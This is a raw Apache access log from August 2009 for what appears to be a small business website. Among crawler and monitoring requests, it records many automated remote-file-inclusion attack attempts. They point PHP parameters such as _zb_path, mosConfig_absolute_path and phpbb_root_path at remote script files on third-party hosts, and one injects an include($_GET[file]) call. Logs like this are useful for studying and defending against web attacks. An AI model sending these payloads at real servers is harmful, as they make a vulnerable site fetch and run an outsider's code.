218.145.31.242 - - [03/Aug/2009:05:43:12 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.71.201 - - [03/Aug/2009:05:43:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4822651500B0E304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.212.186.138 - - [03/Aug/2009:05:44:38 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:44:38 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
67.212.186.138 - - [03/Aug/2009:05:44:38 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
210.220.213.203 - - [03/Aug/2009:05:44:38 -0400] "GET /logs/access_log.Q109070200/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.220.213.203 - - [03/Aug/2009:05:44:39 -0400] "GET /?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.220.213.203 - - [03/Aug/2009:05:44:39 -0400] "GET /logs/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:44:59 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:44:59 -0400] "GET /logs/access_log.Q109072400//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:44:59 -0400] "GET //arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
67.212.186.138 - - [03/Aug/2009:05:45:00 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
80.67.26.40 - - [03/Aug/2009:05:45:04 -0400] "GET /logs/access_log.Q109050700//arcade.php?phpbb_root_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:45:15 -0400] "GET //include/lib.inc.php?site_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:45:15 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
80.67.26.40 - - [03/Aug/2009:05:45:18 -0400] "GET /logs/access_log.Q109052800//include/lib.inc.php?site_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:05:45:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B4234F5C500A6A3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.145.31.242 - - [03/Aug/2009:05:45:28 -0400] "GET /logs/error_log.Q109071400//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
218.145.31.242 - - [03/Aug/2009:05:45:28 -0400] "GET /logs/access_log.Q109070300//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [03/Aug/2009:05:46:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.220.213.203 - - [03/Aug/2009:05:46:41 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://www.koreanschoolcal.org/bbs/lib/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:47:31 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:47:31 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:47:31 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.201 - - [03/Aug/2009:05:47:33 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B244575007F53043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.48.230.9 - - [03/Aug/2009:05:48:06 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:11 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:11 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:20 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:27 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:27 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.48.230.9 - - [03/Aug/2009:05:48:40 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.145.31.242 - - [03/Aug/2009:05:49:13 -0400] "GET /logs/error_log.Q109071400//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
80.67.26.40 - - [03/Aug/2009:05:49:17 -0400] "GET /logs/access_log.Q109052800%20%20//include/lib.inc.php?site_path=http://www.hotlinkfiles.com/files/2697513_mgngy/spread.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.145.31.242 - - [03/Aug/2009:05:49:20 -0400] "GET /logs/access_log.Q109070300//include/mail.inc.php?skin_board_path=http://bruntil.com/cgi/id.txt%0D? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.71.201 - - [03/Aug/2009:05:49:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B24A535007053043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.150.78.235 - - [03/Aug/2009:05:50:26 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:50:26 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:50:27 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:05:50:31 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:05:51:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [03/Aug/2009:05:51:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B2505B5007253043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.58.163.86 - - [03/Aug/2009:05:53:19 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:21 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:21 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:21 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:23 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:23 -0400] "GET /logs/access_log.Q109072500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:51 -0400] "GET /logs/access_log.Q109071500%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:53:54 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.71.16 - - [03/Aug/2009:05:53:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4821D5E500BEE304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [03/Aug/2009:05:54:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):0494510 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.120.227.242 - - [03/Aug/2009:05:54:13 -0400] "GET /logs/access_log.Q109052800/?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 225 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
58.120.227.242 - - [03/Aug/2009:05:54:15 -0400] "GET /?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 200 409 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.58.163.86 - - [03/Aug/2009:05:54:17 -0400] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:54:20 -0400] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:54:20 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:05:54:37 -0400] "GET /logs/access_log.Q109071500///skin/ggambo7002_board/comment_modify.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.120.227.242 - - [03/Aug/2009:05:55:04 -0400] "GET /logs/error_log.Q109052800/?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 224 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.252.241.20 - - [03/Aug/2009:05:55:18 -0400] "GET /logs/access_log.Q109052800/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:05:55:18 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:05:55:18 -0400] "GET /logs/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 12138 "-" "libwww-perl/5.812"
213.251.169.156 - - [03/Aug/2009:05:55:28 -0400] "GET /logs/error_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
213.251.169.156 - - [03/Aug/2009:05:55:28 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.251.169.156 - - [03/Aug/2009:05:55:28 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.252.241.20 - - [03/Aug/2009:05:55:28 -0400] "GET /logs/access_log.Q109052800/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:05:55:31 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:05:55:31 -0400] "GET /logs/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 12138 "-" "libwww-perl/5.812"
213.251.169.156 - - [03/Aug/2009:05:55:43 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.81.182 - - [03/Aug/2009:05:56:02 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [03/Aug/2009:05:56:02 -0400] "GET /logs/error_log.Q107080400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.251.169.156 - - [03/Aug/2009:05:56:14 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.252.241.20 - - [03/Aug/2009:05:56:19 -0400] "GET /logs/error_log.Q109052800/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
209.59.12.99 - - [03/Aug/2009:05:56:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.252.241.20 - - [03/Aug/2009:05:56:26 -0400] "GET /logs/error_log.Q109052800/?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.812"
66.249.71.16 - - [03/Aug/2009:05:56:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01326B423475A500A6A3081+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.251.169.156 - - [03/Aug/2009:05:56:48 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xoomer.virgilio.it/d3athr0xcr3w/id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
192.138.74.36 - - [03/Aug/2009:05:57:58 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
66.249.71.16 - - [03/Aug/2009:05:58:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L2172BA4822851500B4E304T+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.252.241.20 - - [03/Aug/2009:05:59:49 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:05:59:53 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
66.249.71.16 - - [03/Aug/2009:06:00:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B2525D5007B53043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.120.227.242 - - [03/Aug/2009:06:01:29 -0400] "GET /logs/access_log.Q109052800/?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
58.120.227.242 - - [03/Aug/2009:06:01:30 -0400] "GET /?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
58.120.227.242 - - [03/Aug/2009:06:01:31 -0400] "GET /logs/?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 200 12138 "-" "libwww-perl/5.810"
209.59.12.99 - - [03/Aug/2009:06:01:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.185 - - [03/Aug/2009:06:02:24 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:06:02:24 -0400] "GET //include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:06:02:24 -0400] "GET /logs/access_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.140.23.185 - - [03/Aug/2009:06:02:24 -0400] "GET /logs/error_log.Q109071900//include/mail.inc.php?skin_board_path=http://bildpunktlinden.de/administrator/components/com_joomlapack/language/copyright???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.16 - - [03/Aug/2009:06:02:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L21720C4B247505007053043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.120.227.242 - - [03/Aug/2009:06:02:52 -0400] "GET /?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
89.252.241.20 - - [03/Aug/2009:06:03:20 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
89.252.241.20 - - [03/Aug/2009:06:03:21 -0400] "GET /?_zb_path=http://www.karjatie.fi/readme.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.812"
62.80.43.73 - - [03/Aug/2009:06:04:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
62.80.43.73 - - [03/Aug/2009:06:04:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
62.80.43.73 - - [03/Aug/2009:06:04:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
62.80.43.73 - - [03/Aug/2009:06:04:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
67.15.177.55 - - [03/Aug/2009:06:06:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://hakseong-g.hs.kr/bbs//skin/ggambo/x1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.15.177.55 - - [03/Aug/2009:06:06:11 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://hakseong-g.hs.kr/bbs//skin/ggambo/x1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.177.55 - - [03/Aug/2009:06:06:16 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://hakseong-g.hs.kr/bbs//skin/ggambo/x1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:06:06:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.128.135.52 - - [03/Aug/2009:06:06:54 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
38.108.180.166 - - [03/Aug/2009:06:07:18 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
38.108.180.166 - - [03/Aug/2009:06:07:18 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):03+RNCLAS(S0040):9+RNSUBS%20(S0040):0 HTTP/1.1" 200 62774 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)"
216.7.173.20 - - [03/Aug/2009:06:08:21 -0400] "GET //reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:21 -0400] "GET /logs/access_log.Q109061100//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:21 -0400] "GET /logs//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:22 -0400] "GET /logs/access_log.Q109061100//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:22 -0400] "GET /logs//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:22 -0400] "GET /logs/error_log.Q109061100//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:22 -0400] "GET //reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:08:23 -0400] "GET /logs/error_log.Q109061100//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
67.15.177.55 - - [03/Aug/2009:06:08:39 -0400] "GET /logs/access_log.Q109072500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://hakseong-g.hs.kr/bbs//skin/ggambo/x1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:06:08:55 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.120.227.242 - - [03/Aug/2009:06:09:18 -0400] "GET /logs/error_log.Q109052800/?_zb_path=http://www.biggsontour.de//components/com_simpleboard/idste.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
216.7.173.20 - - [03/Aug/2009:06:09:37 -0400] "GET /logs/access_log.Q109061100%20//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
216.7.173.20 - - [03/Aug/2009:06:09:40 -0400] "GET /logs/access_log.Q109061100%20//reflect/spaw_control.config.php?reflect_base=http://www.fcbarcelona.net.au/penisid.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
207.58.163.86 - - [03/Aug/2009:06:09:52 -0400] "GET ///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:06:09:55 -0400] "GET ///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.58.163.86 - - [03/Aug/2009:06:09:55 -0400] "GET /logs///skin/ggambo7002_board/sql.php?dir=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
